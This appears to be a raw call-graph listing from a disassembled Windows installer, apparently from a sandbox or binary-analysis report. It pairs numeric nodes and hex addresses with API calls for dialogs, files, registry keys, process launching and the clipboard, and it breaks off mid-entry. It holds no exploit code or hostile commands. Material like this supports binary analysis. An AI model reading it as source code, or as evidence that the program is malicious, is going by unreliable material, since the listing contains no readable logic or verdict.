3636->3639 3647 4041cc 3636->3647 3637->3639 3637->3647 3641 404204 3638->3641 3642 4041ef 3638->3642 3639->3615 3645 40140b 2 API calls 3641->3645 3644 40140b 2 API calls 3642->3644 3643 404202 3643->3615 3644->3647 3648 40420b 3645->3648 3646->3622 3677 4045a3 3647->3677 3648->3615 3648->3647 3650 40437c GetDlgItem 3649->3650 3651 404391 3650->3651 3652 404399 ShowWindow EnableWindow 3650->3652 3651->3652 3697 4045ec EnableWindow 3652->3697 3654 4043c3 EnableWindow 3659 4043d7 3654->3659 3655 4043dc GetSystemMenu EnableMenuItem SendMessageW 3656 40440c SendMessageW 3655->3656 3655->3659 3656->3659 3658 4040ac 18 API calls 3658->3659 3659->3655 3659->3658 3698 4045ff SendMessageW 3659->3698 3699 40666e lstrcpynW 3659->3699 3661 40443b lstrlenW 3662 4066ab 17 API calls 3661->3662 3663 404451 SetWindowTextW 3662->3663 3664 401389 2 API calls 3663->3664 3666 404462 3664->3666 3665 404495 DestroyWindow 3665->3624 3667 4044af CreateDialogParamW 3665->3667 3666->3621 3666->3622 3666->3665 3668 404490 3666->3668 3667->3624 3669 4044e2 3667->3669 3668->3621 3670 4045ca 18 API calls 3669->3670 3671 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3670->3671 3672 401389 2 API calls 3671->3672 3673 404533 3672->3673 3673->3621 3674 40453b ShowWindow 3673->3674 3675 404616 SendMessageW 3674->3675 3676 404553 3675->3676 3676->3624 3678 4045b0 SendMessageW 3677->3678 3679 4045aa 3677->3679 3678->3643 3679->3678 3681 404649 GetWindowLongW 3680->3681 3682 4046f4 3680->3682 3681->3682 3683 40465e 3681->3683 3682->3621 3683->3682 3684 40468b GetSysColor 3683->3684 3685 40468e 3683->3685 3684->3685 3686 404694 SetTextColor 3685->3686 3687 40469e SetBkMode 3685->3687 3686->3687 3688 4046b6 GetSysColor 3687->3688 3689 4046bc 3687->3689 3688->3689 3690 4046c3 SetBkColor 3689->3690 3691 4046cd 3689->3691 3690->3691 3691->3682 3692 4046e0 DeleteObject 3691->3692 3693 4046e7 CreateBrushIndirect 3691->3693 3692->3693 3693->3682 3695 4066ab 17 API calls 3694->3695 3696 4045d5 SetDlgItemTextW 3695->3696 3696->3613 3697->3654 3698->3659 3699->3661 3822 4016cc 3823 402da6 17 API calls 3822->3823 3824 4016d2 GetFullPathNameW 3823->3824 3825 4016ec 3824->3825 3831 40170e 3824->3831 3828 4069a4 2 API calls 3825->3828 3825->3831 3826 401723 GetShortPathNameW 3827 402c2a 3826->3827 3829 4016fe 3828->3829 3829->3831 3832 40666e lstrcpynW 3829->3832 3831->3826 3831->3827 3832->3831 3833 401e4e GetDC 3834 402d84 17 API calls 3833->3834 3835 401e60 GetDeviceCaps MulDiv ReleaseDC 3834->3835 3836 402d84 17 API calls 3835->3836 3837 401e91 3836->3837 3838 4066ab 17 API calls 3837->3838 3839 401ece CreateFontIndirectW 3838->3839 3840 402638 3839->3840 3841 402950 3842 402da6 17 API calls 3841->3842 3844 40295c 3842->3844 3843 402972 3846 406139 2 API calls 3843->3846 3844->3843 3845 402da6 17 API calls 3844->3845 3845->3843 3847 402978 3846->3847 3869 40615e GetFileAttributesW CreateFileW 3847->3869 3849 402985 3850 402a3b 3849->3850 3853 4029a0 GlobalAlloc 3849->3853 3854 402a23 3849->3854 3851 402a42 DeleteFileW 3850->3851 3852 402a55 3850->3852 3851->3852 3853->3854 3855 4029b9 3853->3855 3856 403377 40 API calls 3854->3856 3870 4035fe SetFilePointer 3855->3870 3858 402a30 CloseHandle 3856->3858 3858->3850 3859 4029bf 3860 4035e8 ReadFile 3859->3860 3861 4029c8 GlobalAlloc 3860->3861 3862 4029d8 3861->3862 3863 402a0c 3861->3863 3864 403377 40 API calls 3862->3864 3865 406210 WriteFile 3863->3865 3868 4029e5 3864->3868 3866 402a18 GlobalFree 3865->3866 3866->3854 3867 402a03 GlobalFree 3867->3863 3868->3867 3869->3849 3870->3859 3871 401956 3872 402da6 17 API calls 3871->3872 3873 40195d lstrlenW 3872->3873 3874 402638 3873->3874 3875 4014d7 3876 402d84 17 API calls 3875->3876 3877 4014dd Sleep 3876->3877 3879 402c2a 3877->3879 3880 4020d8 3881 40219c 3880->3881 3882 4020ea 3880->3882 3884 401423 24 API calls 3881->3884 3883 402da6 17 API calls 3882->3883 3885 4020f1 3883->3885 3890 4022f6 3884->3890 3886 402da6 17 API calls 3885->3886 3887 4020fa 3886->3887 3888 402110 LoadLibraryExW 3887->3888 3889 402102 GetModuleHandleW 3887->3889 3888->3881 3891 402121 3888->3891 3889->3888 3889->3891 3900 406aaa 3891->3900 3894 402132 3897 401423 24 API calls 3894->3897 3898 402142 3894->3898 3895 40216b 3896 4056d0 24 API calls 3895->3896 3896->3898 3897->3898 3898->3890 3899 40218e FreeLibrary 3898->3899 3899->3890 3905 406690 WideCharToMultiByte 3900->3905 3902 406ac7 3903 40212c 3902->3903 3904 406ace GetProcAddress 3902->3904 3903->3894 3903->3895 3904->3903 3905->3902 3906 402b59 3907 402b60 3906->3907 3908 402bab 3906->3908 3910 402ba9 3907->3910 3912 402d84 17 API calls 3907->3912 3909 406a3b 5 API calls 3908->3909 3911 402bb2 3909->3911 3913 402da6 17 API calls 3911->3913 3914 402b6e 3912->3914 3915 402bbb 3913->3915 3916 402d84 17 API calls 3914->3916 3915->3910 3917 402bbf IIDFromString 3915->3917 3919 402b7a 3916->3919 3917->3910 3918 402bce 3917->3918 3918->3910 3924 40666e lstrcpynW 3918->3924 3923 4065b5 wsprintfW 3919->3923 3921 402beb CoTaskMemFree 3921->3910 3923->3910 3924->3921 3925 402a5b 3926 402d84 17 API calls 3925->3926 3927 402a61 3926->3927 3928 402aa4 3927->3928 3929 402a88 3927->3929 3936 40292e 3927->3936 3930 402abe 3928->3930 3931 402aae 3928->3931 3932 402a8d 3929->3932 3933 402a9e 3929->3933 3935 4066ab 17 API calls 3930->3935 3934 402d84 17 API calls 3931->3934 3939 40666e lstrcpynW 3932->3939 3933->3936 3940 4065b5 wsprintfW 3933->3940 3934->3933 3935->3933 3939->3936 3940->3936 3941 403cdb 3942 403ce6 3941->3942 3943 403cea 3942->3943 3944 403ced GlobalAlloc 3942->3944 3944->3943 3713 40175c 3714 402da6 17 API calls 3713->3714 3715 401763 3714->3715 3716 40618d 2 API calls 3715->3716 3717 40176a 3716->3717 3718 40618d 2 API calls 3717->3718 3718->3717 3945 401d5d 3946 402d84 17 API calls 3945->3946 3947 401d6e SetWindowLongW 3946->3947 3948 402c2a 3947->3948 3949 4028de 3950 4028e6 3949->3950 3951 4028ea FindNextFileW 3950->3951 3953 4028fc 3950->3953 3952 402943 3951->3952 3951->3953 3955 40666e lstrcpynW 3952->3955 3955->3953 3956 401563 3957 402ba4 3956->3957 3960 4065b5 wsprintfW 3957->3960 3959 402ba9 3960->3959 3961 401968 3962 402d84 17 API calls 3961->3962 3963 40196f 3962->3963 3964 402d84 17 API calls 3963->3964 3965 40197c 3964->3965 3966 402da6 17 API calls 3965->3966 3967 401993 lstrlenW 3966->3967 3969 4019a4 3967->3969 3968 4019e5 3969->3968 3973 40666e lstrcpynW 3969->3973 3971 4019d5 3971->3968 3972 4019da lstrlenW 3971->3972 3972->3968 3973->3971 3974 40166a 3975 402da6 17 API calls 3974->3975 3976 401670 3975->3976 3977 4069a4 2 API calls 3976->3977 3978 401676 3977->3978 3979 402aeb 3980 402d84 17 API calls 3979->3980 3981 402af1 3980->3981 3982 40292e 3981->3982 3983 4066ab 17 API calls 3981->3983 3983->3982 3984 4026ec 3985 402d84 17 API calls 3984->3985 3986 4026fb 3985->3986 3987 402745 ReadFile 3986->3987 3988 4061e1 ReadFile 3986->3988 3989 402785 MultiByteToWideChar 3986->3989 3990 40283a 3986->3990 3993 4027ab SetFilePointer MultiByteToWideChar 3986->3993 3994 40284b 3986->3994 3996 402838 3986->3996 3997 40623f SetFilePointer 3986->3997 3987->3986 3987->3996 3988->3986 3989->3986 4006 4065b5 wsprintfW 3990->4006 3993->3986 3995 40286c SetFilePointer 3994->3995 3994->3996 3995->3996 3998 40625b 3997->3998 4003 406273 3997->4003 3999 4061e1 ReadFile 3998->3999 4000 406267 3999->4000 4001 4062a4 SetFilePointer 4000->4001 4002 40627c SetFilePointer 4000->4002 4000->4003 4001->4003 4002->4001 4004 406287 4002->4004 4003->3986 4005 406210 WriteFile 4004->4005 4005->4003 4006->3996 3719 40176f 3720 402da6 17 API calls 3719->3720 3721 401776 3720->3721 3722 401796 3721->3722 3723 40179e 3721->3723 3758 40666e lstrcpynW 3722->3758 3759 40666e lstrcpynW 3723->3759 3726 40179c 3730 4068f5 5 API calls 3726->3730 3727 4017a9 3728 405f3d 3 API calls 3727->3728 3729 4017af lstrcatW 3728->3729 3729->3726 3746 4017bb 3730->3746 3731 4069a4 2 API calls 3731->3746 3732 406139 2 API calls 3732->3746 3734 4017cd CompareFileTime 3734->3746 3735 40188d 3737 4056d0 24 API calls 3735->3737 3736 401864 3738 4056d0 24 API calls 3736->3738 3747 401879 3736->3747 3740 401897 3737->3740 3738->3747 3739 40666e lstrcpynW 3739->3746 3741 403377 40 API calls 3740->3741 3742 4018aa 3741->3742 3743 4018be SetFileTime 3742->3743 3745 4018d0 CloseHandle 3742->3745 3743->3745 3744 4066ab 17 API calls 3744->3746 3745->3747 3748 4018e1 3745->3748 3746->3731 3746->3732 3746->3734 3746->3735 3746->3736 3746->3739 3746->3744 3754 405cce MessageBoxIndirectW 3746->3754 3757 40615e GetFileAttributesW CreateFileW 3746->3757 3749 4018e6 3748->3749 3750 4018f9 3748->3750 3752 4066ab 17 API calls 3749->3752 3751 4066ab 17 API calls 3750->3751 3753 401901 3751->3753 3755 4018ee lstrcatW 3752->3755 3756 405cce MessageBoxIndirectW 3753->3756 3754->3746 3755->3753 3756->3747 3757->3746 3758->3726 3759->3727 4007 401a72 4008 402d84 17 API calls 4007->4008 4009 401a7b 4008->4009 4010 402d84 17 API calls 4009->4010 4011 401a20 4010->4011 4012 401573 4013 401583 ShowWindow 4012->4013 4014 40158c 4012->4014 4013->4014 4015 402c2a 4014->4015 4016 40159a ShowWindow 4014->4016 4016->4015 4017 404a74 4018 404a84 4017->4018 4019 404aaa 4017->4019 4020 4045ca 18 API calls 4018->4020 4021 404631 8 API calls 4019->4021 4022 404a91 SetDlgItemTextW 4020->4022 4023 404ab6 4021->4023 4022->4019 4024 4023f4 4025 402da6 17 API calls 4024->4025 4026 402403 4025->4026 4027 402da6 17 API calls 4026->4027 4028 40240c 4027->4028 4029 402da6 17 API calls 4028->4029 4030 402416 GetPrivateProfileStringW 4029->4030 4031 4014f5 SetForegroundWindow 4032 402c2a 4031->4032 4033 401ff6 4034 402da6 17 API calls 4033->4034 4035 401ffd 4034->4035 4036 4069a4 2 API calls 4035->4036 4037 402003 4036->4037 4039 402014 4037->4039 4040 4065b5 wsprintfW 4037->4040 4040->4039 4041 401b77 4042 402da6 17 API calls 4041->4042 4043 401b7e 4042->4043 4044 402d84 17 API calls 4043->4044 4045 401b87 wsprintfW 4044->4045 4046 402c2a 4045->4046 4047 40167b 4048 402da6 17 API calls 4047->4048 4049 401682 4048->4049 4050 402da6 17 API calls 4049->4050 4051 40168b 4050->4051 4052 402da6 17 API calls 4051->4052 4053 401694 MoveFileW 4052->4053 4054 4016a7 4053->4054 4060 4016a0 4053->4060 4055 4069a4 2 API calls 4054->4055 4056 4022f6 4054->4056 4058 4016b6 4055->4058 4057 401423 24 API calls 4057->4056 4058->4056 4059 40642e 36 API calls 4058->4059 4059->4060 4060->4057 4061 4019ff 4062 402da6 17 API calls 4061->4062 4063 401a06 4062->4063 4064 402da6 17 API calls 4063->4064 4065 401a0f 4064->4065 4066 401a16 lstrcmpiW 4065->4066 4067 401a28 lstrcmpW 4065->4067 4068 401a1c 4066->4068 4067->4068 4069 4022ff 4070 402da6 17 API calls 4069->4070 4071 402305 4070->4071 4072 402da6 17 API calls 4071->4072 4073 40230e 4072->4073 4074 402da6 17 API calls 4073->4074 4075 402317 4074->4075 4076 4069a4 2 API calls 4075->4076 4077 402320 4076->4077 4078 402331 lstrlenW lstrlenW 4077->4078 4079 402324 4077->4079 4081 4056d0 24 API calls 4078->4081 4080 4056d0 24 API calls 4079->4080 4083 40232c 4079->4083 4080->4083 4082 40236f SHFileOperationW 4081->4082 4082->4079 4082->4083 4084 401000 4085 401037 BeginPaint GetClientRect 4084->4085 4086 40100c DefWindowProcW 4084->4086 4087 4010f3 4085->4087 4091 401179 4086->4091 4089 401073 CreateBrushIndirect FillRect DeleteObject 4087->4089 4090 4010fc 4087->4090 4089->4087 4092 401102 CreateFontIndirectW 4090->4092 4093 401167 EndPaint 4090->4093 4092->4093 4094 401112 6 API calls 4092->4094 4093->4091 4094->4093 4095 404700 lstrcpynW lstrlenW 4096 401d81 4097 401d94 GetDlgItem 4096->4097 4098 401d87 4096->4098 4100 401d8e 4097->4100 4099 402d84 17 API calls 4098->4099 4099->4100 4101 401dd5 GetClientRect LoadImageW SendMessageW 4100->4101 4102 402da6 17 API calls 4100->4102 4104 401e33 4101->4104 4106 401e3f 4101->4106 4102->4101 4105 401e38 DeleteObject 4104->4105 4104->4106 4105->4106 4107 401503 4108 40150b 4107->4108 4110 40151e 4107->4110 4109 402d84 17 API calls 4108->4109 4109->4110 4111 402383 4112 40238a 4111->4112 4114 40239d 4111->4114 4113 4066ab 17 API calls 4112->4113 4115 402397 4113->4115 4116 405cce MessageBoxIndirectW 4115->4116 4116->4114 4117 402c05 SendMessageW 4118 402c1f InvalidateRect 4117->4118 4119 402c2a 4117->4119 4118->4119 4120 404789 4122 4047a1 4120->4122 4128 4048bb 4120->4128 4121 404925 4123 4049ef 4121->4123 4124 40492f GetDlgItem 4121->4124 4125 4045ca 18 API calls 4122->4125 4131 404631 8 API calls 4123->4131 4126 4049b0 4124->4126 4127 404949 4124->4127 4130 404808 4125->4130 4126->4123 4135 4049c2 4126->4135 4127->4126 4134 40496f SendMessageW LoadCursorW SetCursor 4127->4134 4128->4121 4128->4123 4129 4048f6 GetDlgItem SendMessageW 4128->4129 4153 4045ec EnableWindow 4129->4153 4133 4045ca 18 API calls 4130->4133 4141 4049ea 4131->4141 4137 404815 CheckDlgButton 4133->4137 4157 404a38 4134->4157 4139 4049d8 4135->4139 4140 4049c8 SendMessageW 4135->4140 4136 404920 4154 404a14 4136->4154 4151 4045ec EnableWindow 4137->4151 4139->4141 4142 4049de SendMessageW 4139->4142 4140->4139 4142->4141 4146 404833 GetDlgItem 4152 4045ff SendMessageW 4146->4152 4148 404849 SendMessageW 4149 404866 GetSysColor 4148->4149 4150 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4148->4150 4149->4150 4150->4141 4151->4146 4152->4148 4153->4136 4155 404a22 4154->4155 4156 404a27 SendMessageW 4154->4156 4155->4156 4156->4121 4160 405c94 ShellExecuteExW 4157->4160 4159 40499e LoadCursorW SetCursor 4159->4126 4160->4159 4161 40248a 4162 402da6 17 API calls 4161->4162 4163 40249c 4162->4163 4164 402da6 17 API calls 4163->4164 4165 4024a6 4164->4165 4178 402e36 4165->4178 4168 4024de 4170 4024ea 4168->4170 4173 402d84 17 API calls 4168->4173 4169 402da6 17 API calls 4172 4024d4 lstrlenW 4169->4172 4174 402509 RegSetValueExW 4170->4174 4175 403377 40 API calls 4170->4175 4171 40292e 4172->4168 4173->4170 4176 40251f RegCloseKey 4174->4176 4175->4174 4176->4171 4179 402e51 4178->4179 4182 406509 4179->4182 4183 406518 4182->4183 4184 406523 RegCreateKeyExW 4183->4184 4185 4024b6 4183->4185 4184->4185 4185->4168 4185->4169 4185->4171 4186 40290b 4187 402da6 17 API calls 4186->4187 4188 402912 FindFirstFileW 4187->4188 4189 40293a 4188->4189 4193 402925 4188->4193 4194 4065b5 wsprintfW 4189->4194 4191 402943 4195 40666e lstrcpynW 4191->4195 4194->4191 4195->4193 4196 40190c 4197 401943 4196->4197 4198 402da6 17 API calls 4197->4198 4199 401948 4198->4199 4200 405d7a 67 API calls 4199->4200 4201 401951 4200->4201 4202 40190f 4203 402da6 17 API calls 4202->4203 4204 401916 4203->4204 4205 405cce MessageBoxIndirectW 4204->4205 4206 40191f 4205->4206 4207 40580f 4208 405830 GetDlgItem GetDlgItem GetDlgItem 4207->4208 4209 4059b9 4207->4209 4252 4045ff SendMessageW 4208->4252 4211 4059c2 GetDlgItem CreateThread CloseHandle 4209->4211 4212 4059ea 4209->4212 4211->4212 4214 405a01 ShowWindow ShowWindow 4212->4214 4215 405a3a 4212->4215 4216 405a15 4212->4216 4213 4058a0 4218 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4213->4218 4254 4045ff SendMessageW 4214->4254 4222 404631 8 API calls 4215->4222 4217 405a75 4216->4217 4220 405a29 4216->4220 4221 405a4f ShowWindow 4216->4221 4217->4215 4227 405a83 SendMessageW 4217->4227 4225 405915 4218->4225 4226 4058f9 SendMessageW SendMessageW 4218->4226 4228 4045a3 SendMessageW 4220->4228 4223 405a61 4221->4223 4224 405a6f 4221->4224 4229 405a48 4222->4229 4230 4056d0 24 API calls 4223->4230 4231 4045a3 SendMessageW 4224->4231 4232 405928 4225->4232 4233 40591a SendMessageW 4225->4233 4226->4225 4227->4229 4234 405a9c CreatePopupMenu 4227->4234 4228->4215 4230->4224 4231->4217 4236 4045ca 18 API calls 4232->4236 4233->4232 4235 4066ab 17 API calls 4234->4235 4237 405aac AppendMenuW 4235->4237 4238 405938 4236->4238 4239 405ac9 GetWindowRect 4237->4239 4240 405adc TrackPopupMenu 4237->4240 4241 405941 ShowWindow 4238->4241 4242 405975 GetDlgItem SendMessageW 4238->4242 4239->4240 4240->4229 4244 405af7 4240->4244 4245 405964 4241->4245 4246 405957 ShowWindow 4241->4246 4242->4229 4243 40599c SendMessageW SendMessageW 4242->4243 4243->4229 4247 405b13 SendMessageW 4244->4247 4253 4045ff SendMessageW 4245->4253 4246->4245 4247->4247 4249 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4247->4249 4250 405b55 SendMessageW 4249->4250 4250->4250 4251 405b7e GlobalUnlock SetClipboardData CloseClipboard 4250->4251 4251->4229 4252->4213 4253->4242 4254->4216 4255 404e11 4256 404e21 4255->4256 4257 404e3d 4255->4257 4266 405cb2 GetDlgItemTextW 4256->4266 4259 404e70 4257->4259 4260 404e43 SHGetPathFromIDListW 4257->4260 4262 404e5a SendMessageW 4260->4262 4263 404e53 4260->4263 4261 404e2e SendMessageW 4261->4257 4262->4259 4265 40140b 2 API calls 4263->4265 4265->4262 4266->4261 4267 401491 4268 4056d0 24 API calls 4267->4268 4269 401498 4268->4269 4270 402891 4271 402898 4270->4271 4273 402ba9 4270->4273 4272 402d84 17 API calls 4271->4272 4274 40289f 4272->4274 4275 4028ae SetFilePointer 4274->4275 4275->4273 4276 4028be 4275->4276 4278 4065b5 wsprintfW 4276->4278 4278->4273 4279 401f12 4280 402da6 17 API calls 4279->4280 4281 401f18 4280->4281 4282 402da6 17 API calls 4281->4282 4283 401f21 4282->4283 4284 402da6 17 API calls 4283->4284 4285 401f2a 4284->4285 4286 402da6 17 API calls 4285->4286 4287 401f33 4286->4287 4288 401423 24 API calls 4287->4288 4289 401f3a 4288->4289 4296 405c94 ShellExecuteExW 4289->4296 4291 401f82 4292 406ae6 5 API calls 4291->4292 4294 40292e 4291->4294 4293 401f9f CloseHandle 4292->4293 4293->4294 4296->4291 4297 402f93 4298 402fa5 SetTimer 4297->4298 4299 402fbe 4297->4299 4298->4299 4300 40300c 4299->4300 4301 403012 MulDiv 4299->4301 4302 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4301->4302 4302->4300 4304 401d17 4305 402d84 17 API calls 4304->4305 4306 401d1d IsWindow 4305->4306 4307 401a20 4306->4307 4308 401b9b 4309 401ba8 4308->4309 4310 401bec 4308->4310 4313 401c31 4309->4313 4318 401bbf 4309->4318 4311 401bf1 4310->4311 4312 401c16 GlobalAlloc 4310->4312 4323 40239d 4311->4323 4329 40666e lstrcpynW 4311->4329 4315 4066ab 17 API calls 4312->4315 4314 4066ab 17 API calls 4313->4314 4313->4323 4317 402397 4314->4317 4315->4313 4321 405cce MessageBoxIndirectW 4317->4321 4327 40666e lstrcpynW 4318->4327 4319 401c03 GlobalFree 4319->4323 4321->4323 4322 401bce 4328 40666e lstrcpynW 4322->4328 4325 401bdd 4330 40666e lstrcpynW 4325->4330 4327->4322 4328->4325 4329->4319 4330->4323 4331 40261c 4332 402da6 17 API calls 4331->4332 4333 402623 4332->4333 4336 40615e GetFileAttributesW CreateFileW 4333->4336 4335 40262f 4336->4335 4337 40149e 4338 4014ac PostQuitMessage 4337->4338 4339 40239d 4337->4339 4338->4339 4340 40259e 4350 402de6 4340->4350 4343 402d84 17 API calls 4344 4025b1 4343->4344 4345 4025d9 RegEnumValueW 4344->4345 4346 4025cd RegEnumKeyW 4344->4346 4348 40292e 4344->4348 4347 4025ee RegCloseKey 4345->4347 4346->4347 4347->4348 4351 402da6 17 API calls 4350->4351 4352 402dfd 4351->4352 4353 4064db RegOpenKeyExW 4352->4353 4354 4025a8 4353->4354 4354->4343 4355 4015a3 4356 402da6 17 API calls 4355->4356 4357 4015aa SetFileAttributesW 4356->4357 4358 4015bc 4357->4358 3288 401fa4 3289 402da6 17 API calls 3288->3289 3290 401faa 3289->3290 3291 4056d0 24 API calls 3290->3291 3292 401fb4 3291->3292 3303 405c51 CreateProcessW 3292->3303 3295 401fdd CloseHandle 3298 40292e 3295->3298 3299 401fcf 3300 401fd4 3299->3300 3301 401fdf 3299->3301 3311 4065b5 wsprintfW 3300->3311 3301->3295 3304 401fba 3303->3304 3305 405c84 CloseHandle 3303->3305 3304->3295 3304->3298 3306 406ae6 WaitForSingleObject 3304->3306 3305->3304 3307 406b00 3306->3307 3308 406b12 GetExitCodeProcess 3307->3308 3312 406a77 3307->3312 3308->3299 3311->3295 3313 406a94 PeekMessageW 3312->3313 3314 406aa4 WaitForSingleObject 3313->3314 3315 406a8a DispatchMessageW 3313->3315 3314->3307 3315->3313 4359 40202a 4360 402da6 17 API calls 4359->4360 4361 402031 4360->4361 4362 406a3b 5 API calls 4361->4362 4363 402040 4362->4363 4364 4020cc 4363->4364 4365 40205c GlobalAlloc 4363->4365 4365->4364 4366 402070 4365->4366 4367 406a3b 5 API calls 4366->4367 4368 402077 4367->4368 4369 406a3b 5 API calls 4368->4369 4370 402081 4369->4370 4370->4364 4374 4065b5 wsprintfW 4370->4374 4372 4020ba 4375 4065b5 wsprintfW 4372->4375 4374->4372 4375->4364 4376 40252a 4377 402de6 17 API calls 4376->4377 4378 402534 4377->4378 4379 402da6 17 API calls 4378->4379 4380 40253d 4379->4380 4381 402548 RegQueryValueExW 4380->4381 4382 40292e 4380->4382 4383 402568 4381->4383 4386 40256e RegCloseKey 4381->4386 4383->4386 4387 4065b5 wsprintfW 4383->4387 4386->4382 4387->4386 4388 4021aa 4389 402da6 17 API calls 4388->4389 4390 4021b1 4389->4390 4391 402da6 17 API calls 4390->4391 4392 4021bb 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4021c5 4393->4394 4395 402da6 17 API calls 4394->4395 4396 4021cf 4395->4396 4397 402da6 17 API calls 4396->4397 4398 4021d9 4397->4398 4399 402218 CoCreateInstance 4398->4399 4400 402da6 17 API calls 4398->4400 4403 402237 4399->4403 4400->4399 4401 401423 24 API calls 4402 4022f6 4401->4402 4403->4401 4403->4402 3700 403c2b 3701 403c46 3700->3701 3702 403c3c CloseHandle 3700->3702 3703 403c50 CloseHandle 3701->3703 3704 403c5a 3701->3704 3702->3701 3703->3704 3709 403c88 3704->3709 3707 405d7a 67 API calls 3708 403c6b 3707->3708 3710 403c96 3709->3710 3711 403c5f 3710->3711 3712 403c9b FreeLibrary GlobalFree 3710->3712 3711->3707 3712->3711 3712->3712 4404 401a30 4405 402da6 17 API calls 4404->4405 4406 401a39 ExpandEnvironmentStringsW 4405->4406 4407 401a4d 4406->4407 4409 401a60 4406->4409 4408 401a52 lstrcmpW 4407->4408 4407->4409 4408->4409 4415 4023b2 4416 4023c0 4415->4416 4417 4023ba 4415->4417 4419 4023ce 4416->4419 4420 402da6 17 API calls 4416->4420 4418 402da6 17 API calls 4417->4418 4418->4416 4421 4023dc 4419->4421 4423 402da6 17 API calls 4419->4423 4420->4419 4422 402da6 17 API calls 4421->4422 4424 4023e5 WritePrivateProfileStringW 4422->4424 4423->4421 4425 402434 4426 402467 4425->4426 4427 40243c 4425->4427 4429 402da6 17 API calls 4426->4429 4428 402de6 17 API calls 4427->4428 4430 402443 4428->4430 4431 40246e 4429->4431 4433 40247b 4430->4433 4434 402da6 17 API calls 4430->4434 4436 402e64 4431->4436 4435 402454 RegDeleteValueW RegCloseKey 4434->4435 4435->4433 4437 402e78 4436->4437 4439 402e71 4436->4439 4437->4439 4440 402ea9 4437->4440 4439->4433 4441 4064db RegOpenKeyExW 4440->4441 4442 402ed7 4441->4442 4443 402f81 4442->4443 4444 402ee7 RegEnumValueW 4442->4444 4448 402f0a 4442->4448 4443->4439 4445 402f71 RegCloseKey 4444->4445 4444->4448 4445->4443 4446 402f46 RegEnumKeyW 4447 402f4f RegCloseKey 4446->4447 4446->4448 4449 406a3b 5 API calls 4447->4449 4448->4445 4448->4446 4448->4447 4450 402ea9 6 API calls 4448->4450 4451 402f5f 4449->4451 4450->4448 4451->4443 4452 402f63 RegDeleteKeyW 4451->4452 4452->4443 4453 401735 4454 402da6 17 API calls 4453->4454 4455 40173c SearchPathW 4454->4455 4456 401757 4455->4456 4457 405037 GetDlgItem GetDlgItem 4458 405089 7 API calls 4457->4458 4469 4052ae 4457->4469 4459 405130 DeleteObject 4458->4459 4460 405123 SendMessageW 4458->4460 4461 405139 4459->4461 4460->4459 4463 405170 4461->4463 4464 4066ab 17 API calls 4461->4464 4462 405390 4466 40543c 4462->4466 4476 4053e9 SendMessageW 4462->4476 4500 4052a1 4462->4500 4465 4045ca 18 API calls 4463->4465 4470 405152 SendMessageW SendMessageW 4464->4470 4471 405184 4465->4471 4467 405446 SendMessageW 4466->4467 4468 40544e 4466->4468 4467->4468 4478 405460 ImageList_Destroy 4468->4478 4479 405467 4468->4479 4492 405477 4468->4492 4469->4462 4474 404f85 5 API calls 4469->4474 4491 40531d 4469->4491 4470->4461 4475 4045ca 18 API calls 4471->4475 4472 405382 SendMessageW 4472->4462 4473 404631 8 API calls 4477 40563d 4473->4477 4474->4491 4489 405195 4475->4489 4481 4053fe SendMessageW 4476->4481 4476->4500 4478->4479 4482 405470 GlobalFree 4479->4482 4479->4492 4480 4055f1 4485 405603 ShowWindow GetDlgItem ShowWindow 4480->4485 4480->4500 4484 405411 4481->4484 4482->4492 4483 405270 GetWindowLongW SetWindowLongW 4486 405289 4483->4486 4493 405422 SendMessageW 4484->4493 4485->4500 4487 4052a6 4486->4487 4488 40528e ShowWindow 4486->4488 4510 4045ff SendMessageW 4487->4510 4509 4045ff SendMessageW 4488->4509 4489->4483 4490 4051e8 SendMessageW 4489->4490 4494 40526b 4489->4494 4497 405226 SendMessageW 4489->4497 4498 40523a SendMessageW 4489->4498 4490->4489 4491->4462 4491->4472 4492->4480 4499 405005 4 API calls 4492->4499 4504 4054b2 4492->4504 4493->4466 4494->4483 4494->4486 4497->4489 4498->4489 4499->4504 4500->4473 4501 4055bc 4502 4055c7 InvalidateRect 4501->4502 4505 4055d3 4501->4505 4502->4505 4503 4054e0 SendMessageW 4508 4054f6 4503->4508 4504->4503 4504->4508 4505->4480 4511 404f40 4505->4511 4507 40556a SendMessageW SendMessageW 4507->4508 4508->4501 4508->4507 4509->4500 4510->4469 4514 404e77 4511->4514 4513 404f55 4513->4480 4515 404e90 4514->4515 4516 4066ab 17 API calls 4515->4516 4517 404ef4 4516->4517 4518 4066ab 17 API calls 4517->4518 4519 404eff 4518->4519 4520 4066ab 17 API calls 4519->4520 4521 404f15 lstrlenW wsprintfW SetDlgItemTextW 4520->4521 4521->4513 4522 401d38 4523 402d84 17 API calls 4522->4523 4524 401d3f 4523->4524 4525 402d84 17 API calls 4524->4525 4526 401d4b GetDlgItem 4525->4526 4527 402638 4526->4527 4528 4014b8 4529 4014be 4528->4529 4530 401389 2 API calls 4529->4530 4531 4014c6 4530->4531 4532 40473a lstrlenW 4533 404759 4532->4533 4534 40475b WideCharToMultiByte 4532->4534 4533->4534 4535 404abb 4536 404ae7 4535->4536 4537 404af8 4535->4537 4596 405cb2 GetDlgItemTextW 4536->4596 4539 404b04 GetDlgItem 4537->4539 4545 404b63 4537->4545 4542 404b18 4539->4542 4540 404c47 4546 404df6 4540->4546 4598 405cb2 GetDlgItemTextW 4540->4598 4541 404af2 4543 4068f5 5 API calls 4541->4543 4544 404b2c SetWindowTextW 4542->4544 4549 405fe8 4 API calls 4542->4549 4543->4537 4550 4045ca 18 API calls 4544->4550 4545->4540 4545->4546 4551 4066ab 17 API calls 4545->4551 4548 404631 8 API calls 4546->4548 4553 404e0a 4548->4553 4554 404b22 4549->4554 4555 404b48 4550->4555 4556 404bd7 SHBrowseForFolderW 4551->4556 4552 404c77 4557 406045 18 API calls 4552->4557 4554->4544 4561 405f3d 3 API calls 4554->4561 4558 4045ca 18 API calls 4555->4558 4556->4540 4559 404bef CoTaskMemFree 4556->4559 4560 404c7d 4557->4560 4562 404b56 4558->4562 4563 405f3d 3 API calls 4559->4563 4599 40666e lstrcpynW 4560->4599 4561->4544 4597 4045ff SendMessageW 4562->4597 4565 404bfc 4563->4565 4568 404c33 SetDlgItemTextW 4565->4568 4572 4066ab 17 API calls 4565->4572 4567 404b5c 4570 406a3b 5 API calls 4567->4570 4568->4540 4569 404c94 4571 406a3b 5 